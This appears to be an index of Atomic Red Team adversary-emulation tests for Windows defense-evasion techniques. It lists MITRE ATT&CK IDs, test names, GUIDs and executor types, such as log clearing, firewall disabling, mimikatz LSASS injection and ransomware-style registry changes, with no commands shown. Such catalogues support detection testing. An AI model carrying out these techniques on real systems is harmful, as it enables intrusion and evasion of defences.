41 defense-evasion T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
42 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 2 Masquerade as a built-in system executable 35eb8d16-9820-4423-a2a1-90c4f5edd9ca powershell
43 defense-evasion T1564 Hide Artifacts 1 Extract binary files via VBA 6afe288a-8a8b-4d33-a629-8d03ba9dad3a powershell
44 defense-evasion T1564 Hide Artifacts 2 Create a Hidden User Called "$" 2ec63cc2-4975-41a6-bf09-dffdfb610778 command_prompt
45 defense-evasion T1564 Hide Artifacts 3 Create an "Administrator " user (with a space on the end) 5bb20389-39a5-4e99-9264-aeb92a55a85c powershell
46 defense-evasion T1564 Hide Artifacts 4 Create and Hide a Service with sc.exe 333c7de0-6fbe-42aa-ac2b-c7e40b18246a command_prompt
47 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
48 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
49 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 1 CheckIfInstallable method call ffd9c807-d402-47d2-879d-f915cf2a3a94 powershell
50 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 2 InstallHelper method call d43a5bde-ae28-4c55-a850-3f4c80573503 powershell
51 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 3 InstallUtil class constructor method call 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 powershell
52 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 4 InstallUtil Install method call 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b powershell
53 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 5 InstallUtil Uninstall method call - /U variant 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b powershell
54 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 6 InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant 06d9deba-f732-48a8-af8e-bdd6e4d98c1d powershell
55 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 7 InstallUtil HelpText method call 5a683850-1145-4326-a0e5-e91ced3c6022 powershell
56 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 8 InstallUtil evasive invocation 559e6d06-bb42-4307-bff7-3b95a8254bad powershell
57 defense-evasion T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
58 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 Take ownership using takeown utility 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 command_prompt
59 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 2 cacls - Grant permission to specified user or group recursively a8206bcc-f282-40a9-a389-05d9c0263485 command_prompt
60 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
61 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 4 attrib - hide file 32b979da-7b68-42c9-9a99-0e39900fc36c command_prompt
62 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
63 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 1 Msiexec.exe - Execute Local MSI file with embedded JScript a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04 command_prompt
64 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 2 Msiexec.exe - Execute Local MSI file with embedded VBScript 8d73c7b0-c2b1-4ac1-881a-4aa644f76064 command_prompt
65 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 3 Msiexec.exe - Execute Local MSI file with an embedded DLL 628fa796-76c5-44c3-93aa-b9d8214fd568 command_prompt
66 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 4 Msiexec.exe - Execute Local MSI file with an embedded EXE ed3fa08a-ca18-4009-973e-03d13014d0e8 command_prompt
67 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 5 WMI Win32_Product Class - Execute Local MSI file with embedded JScript 882082f0-27c6-4eec-a43c-9aa80bccdb30 powershell
68 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 6 WMI Win32_Product Class - Execute Local MSI file with embedded VBScript cf470d9a-58e7-43e5-b0d2-805dffc05576 powershell
69 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 7 WMI Win32_Product Class - Execute Local MSI file with an embedded DLL 32eb3861-30da-4993-897a-42737152f5f8 powershell
70 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 8 WMI Win32_Product Class - Execute Local MSI file with an embedded EXE 55080eb0-49ae-4f55-a440-4167b7974f79 powershell
71 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 9 Msiexec.exe - Execute the DllRegisterServer function of a DLL 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d command_prompt
72 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 10 Msiexec.exe - Execute the DllUnregisterServer function of a DLL ab09ec85-4955-4f9c-b8e0-6851baf4d47f command_prompt
73 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 11 Msiexec.exe - Execute Remote MSI file 44a4bedf-ffe3-452e-bee4-6925ab125662 command_prompt
74 defense-evasion T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
75 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 10 Prevent Powershell History Logging 2f898b81-3e97-4abb-bc3f-a95138988370 powershell
76 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 11 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
77 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 12 Set Custom AddToHistoryHandler to Avoid History File Logging 1d0d9aa6-6111-4f89-927b-53e8afae7f94 powershell
78 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
79 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
80 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
81 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
82 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
83 defense-evasion T1562 Impair Defenses 1 Windows Disable LSA Protection 40075d5f-3a70-4c66-9125-f72bee87247d command_prompt
84 defense-evasion T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
85 defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd powershell
86 defense-evasion T1036 Masquerading 2 Malware Masquerading and Execution from Zip File 4449c89b-ec82-43a4-89c1-91e2f1abeecc powershell
87 defense-evasion T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
88 defense-evasion T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
89 defense-evasion T1218 Signed Binary Proxy Execution 1 mavinject - Inject DLL into running process c426dacf-575d-4937-8611-a148a86a5e61 command_prompt
90 defense-evasion T1218 Signed Binary Proxy Execution 2 Register-CimProvider - Execute evil dll ad2c17ed-f626-4061-b21e-b9804a6f3655 command_prompt
91 defense-evasion T1218 Signed Binary Proxy Execution 3 InfDefaultInstall.exe .inf Execution 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef command_prompt
92 defense-evasion T1218 Signed Binary Proxy Execution 4 ProtocolHandler.exe Downloaded a Suspicious File db020456-125b-4c8b-a4a7-487df8afb5a2 command_prompt
93 defense-evasion T1218 Signed Binary Proxy Execution 5 Microsoft.Workflow.Compiler.exe Payload Execution 7cbb0f26-a4c1-4f77-b180-a009aa05637e powershell
94 defense-evasion T1218 Signed Binary Proxy Execution 6 Renamed Microsoft.Workflow.Compiler.exe Payload Executions 4cc40fd7-87b8-4b16-b2d7-57534b86b911 powershell
95 defense-evasion T1218 Signed Binary Proxy Execution 7 Invoke-ATHRemoteFXvGPUDisablementCommand base test 9ebe7901-7edf-45c0-b5c7-8366300919db powershell
96 defense-evasion T1218 Signed Binary Proxy Execution 8 DiskShadow Command Execution 0e1483ba-8f0c-425d-b8c6-42736e058eaa powershell
97 defense-evasion T1218 Signed Binary Proxy Execution 9 Load Arbitrary DLL via Wuauclt (Windows Update Client) 49fbd548-49e9-4bb7-94a6-3769613912b8 command_prompt
98 defense-evasion T1218 Signed Binary Proxy Execution 10 Lolbin Gpscript logon option 5bcda9cd-8e85-48fa-861d-b5a85d91d48c command_prompt
99 defense-evasion T1218 Signed Binary Proxy Execution 11 Lolbin Gpscript startup option f8da74bb-21b8-4af9-8d84-f2c8e4a220e3 command_prompt
100 defense-evasion T1218 Signed Binary Proxy Execution 12 Lolbas ie4uinit.exe use as proxy 13c0804e-615e-43ad-b223-2dfbacd0b0b3 command_prompt
101 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 5 Windows - Modify file creation timestamp with PowerShell b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c powershell
102 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 6 Windows - Modify file last modified timestamp with PowerShell f8f6634d-93e1-4238-8510-f8a90a20dcf2 powershell
103 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 7 Windows - Modify file last access timestamp with PowerShell da627f63-b9bd-4431-b6f8-c5b44d061a62 powershell
104 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 8 Windows - Timestomp a File d7512c33-3a75-4806-9893-69abc3ccdd43 powershell
105 defense-evasion T1620 Reflective Code Loading 1 WinPwn - Reflectively load Mimik@tz into memory 56b9589c-9170-4682-8c3d-33b86ecb5119 powershell
106 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 1 CMSTP Executing Remote Scriptlet 34e63321-9683-496b-bbc1-7566bc55e624 command_prompt
107 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 2 CMSTP Executing UAC Bypass 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 command_prompt
108 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
109 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 2 Kill Event Log Service Threads 41ac52ba-5d5e-40c0-b267-573ed90489bd powershell
110 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 3 Impair Windows Audit Log Policy 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 command_prompt
111 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 4 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
112 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 5 Disable Event Logging with wevtutil b26a3340-dad7-4360-9176-706269c74103 command_prompt
113 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 6 Makes Eventlog blind with Phant0m 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741 command_prompt
114 defense-evasion T1218.002 Signed Binary Proxy Execution: Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
115 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 1 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
116 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall via Registry afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
117 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 3 Allow SMB and RDP on Microsoft Defender Firewall d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
118 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 4 Opening ports for proxy - HARDRAIN 15e57006-79dd-46df-9bf9-31bc24fb5a80 command_prompt
119 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 5 Open a local port through Windows Firewall to any profile 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
120 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 6 Allow Executable Through Firewall Located in Non-Standard Location 6f5822d2-d38d-4f48-9bfc-916607ff6b8c powershell
121 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 16 LockBit Black - Unusual Windows firewall registry modification -cmd a4651931-ebbb-4cde-9363-ddf3d66214cb command_prompt
122 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 17 LockBit Black - Unusual Windows firewall registry modification -Powershell 80b453d1-eec5-4144-bf08-613a6c3ffe12 powershell
123 defense-evasion T1207 Rogue Domain Controller 1 DCShadow (Active Directory) 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 powershell
124 defense-evasion T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
125 defense-evasion T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
126 defense-evasion T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
127 defense-evasion T1112 Modify Registry 4 Add domain to Trusted sites Zone cf447677-5a4e-4937-a82c-e47d254afd57 powershell
128 defense-evasion T1112 Modify Registry 5 Javascript in registry 15f44ea9-4571-4837-be9e-802431a7bfae powershell
129 defense-evasion T1112 Modify Registry 6 Change Powershell Execution Policy to Bypass f3a6cceb-06c9-48e5-8df8-8867a6814245 powershell
130 defense-evasion T1112 Modify Registry 7 BlackByte Ransomware Registry Changes - CMD 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b command_prompt
131 defense-evasion T1112 Modify Registry 8 BlackByte Ransomware Registry Changes - Powershell 0b79c06f-c788-44a2-8630-d69051f1123d powershell
132 defense-evasion T1112 Modify Registry 9 Disable Windows Registry Tool ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 command_prompt
133 defense-evasion T1112 Modify Registry 10 Disable Windows CMD application d2561a6d-72bd-408c-b150-13efe1801c2a powershell
134 defense-evasion T1112 Modify Registry 11 Disable Windows Task Manager application af254e70-dd0e-4de6-9afe-a994d9ea8b62 command_prompt
135 defense-evasion T1112 Modify Registry 12 Disable Windows Notification Center c0d6d67f-1f63-42cc-95c0-5fd6b20082ad command_prompt
136 defense-evasion T1112 Modify Registry 13 Disable Windows Shutdown Button 6e0d1131-2d7e-4905-8ca5-d6172f05d03d command_prompt
137 defense-evasion T1112 Modify Registry 14 Disable Windows LogOff Button e246578a-c24d-46a7-9237-0213ff86fb0c command_prompt
138 defense-evasion T1112 Modify Registry 15 Disable Windows Change Password Feature d4a6da40-618f-454d-9a9e-26af552aaeb0 command_prompt
139 defense-evasion T1112 Modify Registry 16 Disable Windows Lock Workstation Feature 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 command_prompt
140 defense-evasion T1112 Modify Registry 17 Activate Windows NoDesktop Group Policy Feature 93386d41-525c-4a1b-8235-134a628dee17 command_prompt
141 defense-evasion T1112 Modify Registry 18 Activate Windows NoRun Group Policy Feature d49ff3cc-8168-4123-b5b3-f057d9abbd55 command_prompt
142 defense-evasion T1112 Modify Registry 19 Activate Windows NoFind Group Policy Feature ffbb407e-7f1d-4c95-b22e-548169db1fbd command_prompt
143 defense-evasion T1112 Modify Registry 20 Activate Windows NoControlPanel Group Policy Feature a450e469-ba54-4de1-9deb-9023a6111690 command_prompt
144 defense-evasion T1112 Modify Registry 21 Activate Windows NoFileMenu Group Policy Feature 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 command_prompt
145 defense-evasion T1112 Modify Registry 22 Activate Windows NoClose Group Policy Feature 12f50e15-dbc6-478b-a801-a746e8ba1723 command_prompt
146 defense-evasion T1112 Modify Registry 23 Activate Windows NoSetTaskbar Group Policy Feature d29b7faf-7355-4036-9ed3-719bd17951ed command_prompt
147 defense-evasion T1112 Modify Registry 24 Activate Windows NoTrayContextMenu Group Policy Feature 4d72d4b1-fa7b-4374-b423-0fe326da49d2 command_prompt
148 defense-evasion T1112 Modify Registry 25 Activate Windows NoPropertiesMyDocuments Group Policy Feature 20fc9daa-bd48-4325-9aff-81b967a84b1d command_prompt
149 defense-evasion T1112 Modify Registry 26 Hide Windows Clock Group Policy Feature 8023db1e-ad06-4966-934b-b6a0ae52689e command_prompt
150 defense-evasion T1112 Modify Registry 27 Windows HideSCAHealth Group Policy Feature a4637291-40b1-4a96-8c82-b28f1d73e54e command_prompt
151 defense-evasion T1112 Modify Registry 28 Windows HideSCANetwork Group Policy Feature 3e757ce7-eca0-411a-9583-1c33b8508d52 command_prompt
152 defense-evasion T1112 Modify Registry 29 Windows HideSCAPower Group Policy Feature 8d85a5d8-702f-436f-bc78-fcd9119496fc command_prompt
153 defense-evasion T1112 Modify Registry 30 Windows HideSCAVolume Group Policy Feature 7f037590-b4c6-4f13-b3cc-e424c5ab8ade command_prompt
154 defense-evasion T1112 Modify Registry 31 Windows Modify Show Compress Color And Info Tip Registry 795d3248-0394-4d4d-8e86-4e8df2a2693f command_prompt
155 defense-evasion T1112 Modify Registry 32 Windows Powershell Logging Disabled 95b25212-91a7-42ff-9613-124aca6845a8 command_prompt
156 defense-evasion T1112 Modify Registry 33 Windows Add Registry Value to Load Service in Safe Mode without Network 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 command_prompt
157 defense-evasion T1112 Modify Registry 34 Windows Add Registry Value to Load Service in Safe Mode with Network c173c948-65e5-499c-afbe-433722ed5bd4 command_prompt
158 defense-evasion T1112 Modify Registry 35 Disable Windows Toast Notifications 003f466a-6010-4b15-803a-cbb478a314d7 command_prompt
159 defense-evasion T1112 Modify Registry 36 Disable Windows Security Center Notifications 45914594-8df6-4ea9-b3cc-7eb9321a807e command_prompt
160 defense-evasion T1112 Modify Registry 37 Suppress Win Defender Notifications c30dada3-7777-4590-b970-dc890b8cf113 command_prompt
161 defense-evasion T1112 Modify Registry 38 Allow RDP Remote Assistance Feature 86677d0e-0b5e-4a2b-b302-454175f9aa9e command_prompt
162 defense-evasion T1112 Modify Registry 39 NetWire RAT Registry Key Creation 65704cd4-6e36-4b90-b6c1-dc29a82c8e56 command_prompt
163 defense-evasion T1112 Modify Registry 40 Ursnif Malware Registry Key Creation c375558d-7c25-45e9-bd64-7b23a97c1db0 command_prompt
164 defense-evasion T1112 Modify Registry 41 Terminal Server Client Connection History Cleared 3448824b-3c35-4a9e-a8f5-f887f68bea21 command_prompt
165 defense-evasion T1112 Modify Registry 42 Disable Windows Error Reporting Settings d2c9e41e-cd86-473d-980d-b6403562e3e1 command_prompt
166 defense-evasion T1112 Modify Registry 43 DisallowRun Execution Of Certain Applications 71db768a-5a9c-4047-b5e7-59e01f188e84 command_prompt
167 defense-evasion T1112 Modify Registry 44 Enabling Restricted Admin Mode via Command_Prompt fe7974e5-5813-477b-a7bd-311d4f535e83 command_prompt
168 defense-evasion T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
169 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
170 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
171 defense-evasion T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
172 defense-evasion T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
173 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
174 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 2 Delete System Logs Using Clear-EventLog b13e9306-3351-4b4b-a6e8-477358b0b498 powershell
175 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 3 Clear Event Logs via VBA 1b682d84-f075-4f93-9a89-8a8de19ffd6e powershell
176 defense-evasion T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
177 defense-evasion T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
178 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 1 Odbcconf.exe - Execute Arbitrary DLL 2430498b-06c0-4b92-a448-8ad263c388e2 command_prompt
179 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 2 Odbcconf.exe - Load Response File 331ce274-f9c9-440b-9f8c-a1006e1fce0b command_prompt
180 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 3 Disable Powershell ETW Provider - Windows 6f118276-121d-4c09-bb58-a8fb4a72ee84 powershell
181 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 4 Disable .NET Event Tracing for Windows Via Registry (cmd) 8a4c33be-a0d3-434a-bee6-315405edbd5b command_prompt
182 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 5 Disable .NET Event Tracing for Windows Via Registry (powershell) 19c07a45-452d-4620-90ed-4c34fffbe758 powershell
183 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 6 LockBit Black - Disable the ETW Provider of Windows Defender -cmd f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 command_prompt
184 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 7 LockBit Black - Disable the ETW Provider of Windows Defender -Powershell 69fc085b-5444-4879-8002-b24c8e1a3e02 powershell
185 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
186 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
187 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
188 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
189 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
190 defense-evasion T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
191 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
192 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
193 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 3 Remove the Zone.Identifier alternate data stream 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9 powershell
194 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 4 Execute LNK file from ISO c2587b8d-743d-4985-aa50-c83394eaeb68 powershell
195 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 1 Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 1483fab9-4f52-4217-a9ce-daa9d7747cae command_prompt
196 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 2 Mshta executes VBScript to execute malicious command 906865c3-e05f-4acc-85c4-fbc185455095 command_prompt
197 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 3 Mshta Executes Remote HTML Application (HTA) c4b97eeb-5249-4455-a607-59f95485cb45 powershell
198 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 4 Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement 007e5672-2088-4853-a562-7490ddc19447 powershell
199 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 5 Invoke HTML Application - Jscript Engine Simulating Double Click 58a193ec-131b-404e-b1ca-b35cf0b18c33 powershell
200 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 6 Invoke HTML Application - Direct download from URI 39ceed55-f653-48ac-bd19-aceceaf525db powershell
201 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 7 Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler e7e3a525-7612-4d68-a5d3-c4649181b8af powershell
202 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 8 Invoke HTML Application - JScript Engine with Inline Protocol Handler d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 powershell
203 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 9 Invoke HTML Application - Simulate Lateral Movement over UNC Path b8a8bdb2-7eae-490d-8251-d5e0295b2362 powershell
204 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 10 Mshta used to Execute PowerShell 8707a805-2b76-4f32-b1c0-14e558205772 command_prompt
205 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
206 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
207 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
208 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
209 defense-evasion T1564.002 Hide Artifacts: Hidden Users 3 Create Hidden User in Registry 173126b7-afe4-45eb-8680-fa9f6400431c command_prompt
210 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
211 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
212 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
213 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
214 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
215 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 1 Compiled HTML Help Local Payload 5cb87818-0d7c-4469-b7ef-9224107aebe8 command_prompt
216 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 2 Compiled HTML Help Remote Payload 0f8af516-9818-4172-922b-42986ef1e81d command_prompt
217 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 3 Invoke CHM with default Shortcut Command Execution 29d6f0d7-be63-4482-8827-ea77126c1ef7 powershell
218 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 4 Invoke CHM with InfoTech Storage Protocol Handler b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 powershell
219 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 5 Invoke CHM Simulate Double click 5decef42-92b8-4a93-9eb2-877ddcb9401a powershell
220 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 6 Invoke CHM with Script Engine and Help Topic 4f83adda-f5ec-406d-b318-9773c9ca92e5 powershell
221 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 7 Invoke CHM Shortcut Command with ITS and Help Topic 15756147-7470-4a83-87fb-bb5662526247 powershell
222 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 8 Decompile Local CHM File 20cb05e0-1fa5-406d-92c1-84da4ba01813 command_prompt
223 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 1 Add Network Share 14c38f32-6509-46d8-ab43-d53e32d2b131 command_prompt
224 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 2 Remove Network Share 09210ad5-1ef2-4077-9ad3-7351e13e9222 command_prompt
